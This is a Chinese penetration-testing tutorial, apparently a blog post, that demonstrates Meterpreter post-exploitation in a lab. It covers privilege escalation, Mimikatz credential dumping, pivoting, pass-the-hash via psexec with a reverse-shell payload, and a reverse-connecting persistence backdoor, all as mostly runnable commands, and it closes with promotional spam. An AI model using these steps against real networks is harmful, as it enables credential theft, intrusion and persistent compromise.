Meterpreter 后渗透实战,内网横向移动入门

发布时间:2026/9/29 13:04:48

Meterpreter 后渗透实战,内网横向移动入门 Meterpreter 后渗透实战内网横向移动入门前言拿到 Meterpreter 会话只是渗透的起点而不是终点。很多新手利用永恒之蓝拿到靶机 shell 之后不知道下一步该干什么以为拿到一台机器就完成渗透。而**后渗透Post Exploitation**的核心目标就是拿下第一台跳板机之后收集内网信息、抓取账号凭证、搭建网络隧道横向渗透内网中其他主机扩大攻击面。Meterpreter 是 Metasploit 内置的高级 Payload它不是普通 cmd shell支持进程迁移、内存加载插件、凭证抓取、端口转发、路由隧道等强大能力。本文基于 Windows 靶场Blue 靶机 / Metasploitable完整演示会话基础操作、权限提升、内网信息收集、凭证抓取、路由隧道搭建、端口转发以及经典的哈希传递 PTH 横向移动。所有操作仅限本地虚拟机靶场或拥有书面授权的演练环境。免责声明本文仅用于网络安全学习。严禁在未授权内网、公网主机执行后渗透、凭证抓取、横向移动操作违规行为触犯《网络安全法》承担法律责任。一、环境说明与前置回顾攻击机Kali Linux跳板机已拿下Windows7IP192.168.172.148已获取 Meterpreter 会话内网另一台靶机192.168.172.149同网段 Windows 主机445 端口开放前置上一篇 NmapMSF 文章已经通过永恒之蓝 MS17-010 拿到跳板机的 meterpreter 会话。进入 msfconsole成功拿到会话界面meterpreter Meterpreter 基础常用命令# 查看帮助 ? # 获取系统信息 sysinfo # 查看当前用户权限 getuid # 查看网络网卡信息 ipconfig # 查看路由表 route # 查看进程列表 ps # 上传文件到目标 upload /root/test.exe C:\Windows\Temp\ # 下载文件到攻击机 download C:\Windows\System32\drivers\etc\hosts /root/ # 后台挂起当前会话回到msf控制台 background # 切换回会话session后面跟会话ID sessions -i 1二、进程迁移 migrate后渗透第一步必做Meterpreter 默认注入在漏洞利用创建的临时进程中如果进程关闭会话直接断开。所以拿到会话第一件事迁移到系统稳定进程保证会话持久。执行 ps 查看进程列表找到稳定系统进程例如explorer.exe、winlogon.exemeterpreter ps迁移到指定 PIDmeterpreter migrate 1234或者直接按进程名迁移新版 meterpreter 支持meterpreter migrate -N explorer.exe迁移成功提示Migration completed successfully。注意迁移需要足够权限如果当前不是 SYSTEM 权限会失败需要先提权。三、权限提升拿到 SYSTEM 最高权限Windows 下很多操作抓取内存密码、读取 SAM 哈希都需要 SYSTEM 权限。方法 1getsystem 一键提权Meterpreter 内置meterpreter getsystem原理尝试多种 Windows 本地提权技术自动提升到系统权限。执行完再getuid看到NT AUTHORITY\SYSTEM代表成功。方法 2bypassuac 模块普通管理员权限绕过 UAC如果 getsystem 失败可以后台会话调用 bypassuac 模块。meterpreter background msf6 use exploit/windows/local/bypassuac_injection msf6 exploit(bypassuac_injection) set SESSION 1 msf6 exploit(bypassuac_injection) run执行成功拿到新的高权限 meterpreter 会话。四、内网信息收集跳板机内部探查拿到跳板机高权限之后第一步不是直接横向而是先摸清内网拓扑。# 查看网卡、网段判断是否多网卡存在其他内网段 ipconfig # 查看arp缓存查看跳板机曾经访问过哪些内网机器 arp # 查看目标机器网络连接 netstat -anoMeterpreter 内置脚本扫描同网段存活主机meterpreter run post/multi/gather/arp_scanner RHOSTS192.168.172.0/24脚本会利用跳板机去扫描同网段存活 IP找出内网其他主机。收集完网段信息之后我们发现内网还有另一台机器192.168.172.149。攻击机原本可以直接访问实战场景中很多内网主机只能跳板机访问攻击机无法直接连通这时就需要搭建路由隧道。五、凭证抓取获取账号密码 / NTLM 哈希横向移动核心横向移动本质就是拿着 A 机器上抓取到的账号凭证去登录 B 机器。两种最常用方式hashdump 抓取 SAM 本地哈希、load kiwi 加载 Mimikatz 抓取内存凭据。1. hashdump 读取 SAM 数据库本地账号 NTLM 哈希必须 SYSTEM 权限。meterpreter hashdump输出格式用户名:RID:LM哈希:NT哈希:::Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::NTLM 哈希就是我们用于哈希传递Pass-the-HashPTH的凭证。拿到这个哈希不需要明文密码就可以在内网访问同账号的其他 Windows 主机。2. load kiwi调用 Mimikatz 抓取内存凭据推荐kiwi 是 Meterpreter 内置的 Mimikatz 扩展直接在内存运行不需要上传 mimikatz.exe 落地文件不容易被杀毒软件捕获。meterpreter load kiwi # 导出所有可用凭据明文密码、哈希、kerberos票据 meterpreter creds_all # 导出lsass内存登录密码 meterpreter kiwi_cmd sekurlsa::logonpasswords # 导出SAM账号哈希 meterpreter kiwi_cmd lsadump::samsekurlsa::logonpasswords可以直接读出内存中保存的明文账号密码如果用户最近登录过就能直接拿到明文。重要提示Windows10 1709 之后默认开启 LSA 保护很难直接抓取明文但 NTLM 哈希仍然可以尝试哈希传递。六、内网隧道搭建Autoroute SOCKS 代理跨网段跳板实战场景攻击机只能访问跳板机 192.168.172.148内网另一个网段10.0.0.0/24只能跳板机访问攻击机无法直达。此时需要路由转发 SOCKS 代理让 Kali 的 Nmap、Proxychains 全部流量经过跳板机访问内网。步骤 1Meterpreter 添加路由 autoroute在 meterpreter 会话内执行 autoroute把内网网段路由绑定到当前会话。meterpreter run autoroute -s 192.168.172.0/24 # 查看路由表 meterpreter run autoroute -p执行background把会话放到后台。步骤 2MSF 开启 socks_proxy 代理msf6 use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) set SRVPORT 1080 msf6 auxiliary(server/socks_proxy) set SRVHOST 127.0.0.1 msf6 auxiliary(server/socks_proxy) set VERSION 5 # -j后台持续运行 msf6 auxiliary(server/socks_proxy) run -jjobs 命令可以查看后台运行的代理任务。步骤 3配置 proxychainsKali 工具走代理访问内网修改/etc/proxychains4.conf文件末尾添加socks5 127.0.0.1 1080保存退出。之后所有工具加proxychains4前缀流量就会经过跳板机访问内网。# 通过跳板机对内网主机扫描 proxychains4 nmap -sT -Pn -p445,3389 192.168.172.149注意nmap 扫描 socks 代理只能使用 TCP 扫描-sT不能使用 SYN 扫描-sS。七、端口转发 portfwd单独映射内网端口如果只需要访问内网某一台机器的单个端口例如内网 Web、RDP3389使用 portfwd 端口转发不用全局 socks 代理。在 meterpreter 会话执行# 将内网192.168.172.149的3389端口映射到攻击机本地1234端口 meterpreter portfwd add -l 1234 -p 3389 -r 192.168.172.149参数说明-l攻击机本地监听端口-p目标内网主机端口-r内网目标 IP之后在 Kali 访问本机 1234 端口流量会转发到内网主机 3389RDP。查看转发规则portfwd list删除转发规则portfwd delete -l 1234八、横向移动实战PTH 哈希传递攻击最经典入门横向原理Windows 的 NTLM 认证验证的是 NTLM 哈希不一定需要明文密码。拿到 Administrator 的 NTLM 哈希只要目标主机开启 445本地管理员账号相同就可以直接登录拿到新的 Meterpreter 会话。前置条件目标 Windows 主机 445 端口开放开启 Admin$ 默认共享账号本地管理员账号名一致操作步骤后台挂起当前 meterpreter 会话meterpreter background加载 psexec 模块使用哈希传递msf6 use exploit/windows/smb/psexec msf6 exploit(psexec) set RHOSTS 192.168.172.149 # 用户名Administrator msf6 exploit(psexec) set SMBUser Administrator # SMBPass填写 LMhash:NThash msf6 exploit(psexec) set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 # 设置payload msf6 exploit(psexec) set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(psexec) set LHOST 192.168.172.131 msf6 exploit(psexec) set LPORT 4444 msf6 exploit(psexec) exploit成功执行直接拿到第二台内网主机的 Meterpreter 会话横向移动成功拿到新会话之后就可以重复整套流程迁移进程、提权、抓取这台机器的凭证继续向内网深处横向。补充如果不需要拿到 shell仅执行一条命令可以用auxiliary/admin/smb/psexec_command模块用哈希执行系统命令。九、持久化简单入门靶场练习渗透拿到权限之后为了防止会话断开可以添加自启动后门实现持久化。实战红队谨慎使用等保 / 渗透测试项目一般清理后门。# meterpreter内置persistence持久化脚本老模块仅靶场练习 run persistence -X -i 10 -p 5555 -r 192.168.172.131-X开机自启-i每 10 秒尝试回连-p回连端口生产环境 / 正式渗透测试结束必须清除后门痕迹不允许遗留持久化木马。十、完整后渗透 横向移动实战链路总结获取 Meterpreter 会话 → 进程迁移 migrate防止会话断开getsystem 提权拿到 SYSTEM 权限ipconfig/arp 扫描收集内网网段信息hashdump /load kiwi 抓取账号、NTLM 哈希autoroute 添加内网路由搭建 socks 代理打通内网访问通道对内网其他主机扫描确认 445 端口开放使用 psexec PTH 哈希传递横向拿下第二台主机在新主机重复整套流程持续扩大内网权限十一、新手高频踩坑点❌ 坑 1migrate 迁移失败getsystem 提权失败权限不足。普通用户无法迁移系统进程需要管理员 / SYSTEM 权限新版 Windows 补丁会阻止部分提权方式。❌ 坑 2哈希传递 Pth 失败目标 445 端口关闭、防火墙拦截Windows 2012 默认限制本地管理员哈希传递LSA 保护Admin$ 共享被组策略关闭哈希复制错误LM 和 NT 哈希中间冒号不能丢。❌ 坑 3autoroute 添加路由之后直接 nmap -sS 扫描内网socks 代理不支持 SYN 半连接扫描只能使用-sTTCP 全连接扫描。❌ 坑 4代理开启但是无法访问内网机器确认 autoroute 网段填写正确目标防火墙是否拦截proxychains 配置文件末尾 socks5 地址端口是否正确。❌ 坑 5直接对公网主机执行凭证抓取、横向移动严重违法仅限本地虚拟机靶场练习。十二、学习建议先吃透 Meterpreter 基础命令理解进程迁移、提权原理不要直接复制命令一把梭。先在单网段靶场练习哈希传递再练习跨网段路由隧道。区分两个概念端口转发 portfwd单端口映射、socks 代理全局流量隧道。横向移动不是只有 PTH后续还可以学习 PTT 票据传递、WMI、SMBexec 等多种方式。渗透测试讲究痕迹管理正式项目操作完成后清理日志、删除上传文件不留后门。总结Meterpreter 的后渗透是内网渗透的核心。拿到初始 shell 只是入口进程迁移、权限提升、内网信息收集、凭证抓取、隧道搭建、横向移动构成完整攻击链。哈希传递 PTH 是入门最简单的横向技术核心思路就是拿下一台机器 → 偷凭证 → 用凭证拿下内网其他机器。理解这套思路才算真正入门内网渗透而不是只会跑漏洞利用模块。一句话记住信息收集抓凭证路由打通内网凭证用来横向。以上就是今天的分享觉得有帮助记得点赞收藏以上所说到的漏洞扫描工具都整理成压缩包了朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】同时还为准备学习网络安全黑客或者正在学习整理了一套360独家内部资料包含以下内容如有需要也可文末获取①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
延伸阅读

更多相关文章

2026/9/29 13:04:48

POE温湿度记录仪布设的物理层可靠性设计

1. 为什么传统机房巡检在POE温湿度记录仪落地时频频“掉链子”去年Q3我们接手了一个老数据中心的智能化升级项目,目标很明确:用POE供电的以太网温湿度记录仪替代原有分散部署的USB/RS485采集器人工抄表模式。听起来是标准的“换硬件、接网线、上平台”三…

2026/9/29 13:04:48

MIPI LP RX调试指南:从协议原理到FPGA实现与花屏排障

干嵌入式显示这一行十年,我调过最多的接口就是MIPI。每次接到“屏没信号”的报障,我第一件事不是抓高速差分波形,而是先看LP模式有没有起来。这话说出来很多新人不太理解:MIPI LP RX这个角色,明明身处物理层最不起眼的…

2026/9/29 13:04:48

机器视觉与深度学习:从原理选型到产线落地全指南

1. 机器视觉遇上深度学习:一场发生在产线上的范式转移这几年在视觉行业里有一个很明显的变化:客户提需求的时候,越来越愿意在算法环节给深度学习一个机会。放在五六年前,提起机器视觉,大家聊的基本还是图像处理那套东西…

2026/9/29 11:07:23

东莞市品牌网站建设报价常见报错与解决

东莞品牌网站建设报价单背后:一份保姆级建站教程避坑实录 网站做好了没人访问,这大概是很多老板最头疼的事。花了大几万做的品牌站,上线后流量惨淡,比路边摊还冷清。别急着骂外包公司,很多“东莞品牌网站建设报价”里藏着不少猫腻,比如用模板站冒充定制…

2026/9/28 6:05:15

如何划分训练/验证集:Spirula Studio五种eval_mode策略详解

如何划分训练/验证集:Spirula Studio五种eval_mode策略详解 【免费下载链接】spirula-studio Cross-vendor 3D Gaussian Splatting trainer - video to splat to mesh, Vulkan or CUDA. 项目地址: https://gitcode.com/GitHub_Trending/sp/spirula-studio Sp…

2026/9/29 7:00:49

SEO怎么推广速查手册新手避坑实战指南

SEO怎么推广速查手册新手避坑实战指南 模板网站太丑不够用?别急着加滤镜,那是治标不治本。很多老板盯着后台流量掉得眼红,却还在纠结首页Banner的圆角是不是3像素。这就像穿着西装去挖土,姿势不对,努力白费。我整理这份 速查手册…

2026/9/29 0:04:04

AI Evals实战指南:从零搭建LLM应用评估体系与CI/CD集成

1. 为什么AI Evals值得你花时间搞明白做LLM应用的人,迟早会撞上同一堵墙:模型输出飘忽不定,今天答得好好的,明天换个问法就胡说八道。你改了一版提示词,感觉好像好了点,但到底好了多少?说不清。…

2026/9/29 0:04:04

Java采购管理系统实战:从数据库设计到事务一致性

简介:这是一套面向Java Web初学者与课程设计者的采购管理系统完整源码,采用JSP技术搭建,配合MySQL数据库,用于解决企业采购信息的管理问题,适合作为毕业设计、课程大作业或进销存类项目的参考模板。系统实现了用户登录…

2026/9/29 3:53:39

USB Type-C PCB布局分区设计:电源、高速信号与PD协议全攻略

做硬件这行,Type-C接口算是典型的“看着简单,做起来全坑”的东西。光引脚就24个,高低速信号、电源、控制线全部塞在一个小小的连接器里,如果PCB布局不做规划,打样回来基本就是“插上没反应”、“高速掉线”、“静电一打…

2026/9/29 9:46:12

系统编程学习原型如何补齐稳定性边界

系统编程学习原型如何补齐稳定性边界预算有限时&#xff0c;我先优化明显多余的复制&#xff0c;而不是猜测性地换容器。用借用传递只读数据通常就能减少分配&#xff1a; fn parse(line: &str) -> Result<Item, Error> { /* ... */ }用基准确认热点确实在分配&am…

2026/9/29 6:36:14

雨花区哪家财务公司代理记账比较好?

在雨花区&#xff0c;企业处理财税事务常常面临诸多挑战&#xff0c;选择一家靠谱的财务公司至关重要。湖南巨勤财务管理咨询有限公司就是本地正规实体财税服务机构&#xff0c;深耕本地工商财税行业多年&#xff0c;熟悉当地工商局、税务局最新政策与申报流程。主营公司注册、…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
☎咨询二维码 ☎ ↑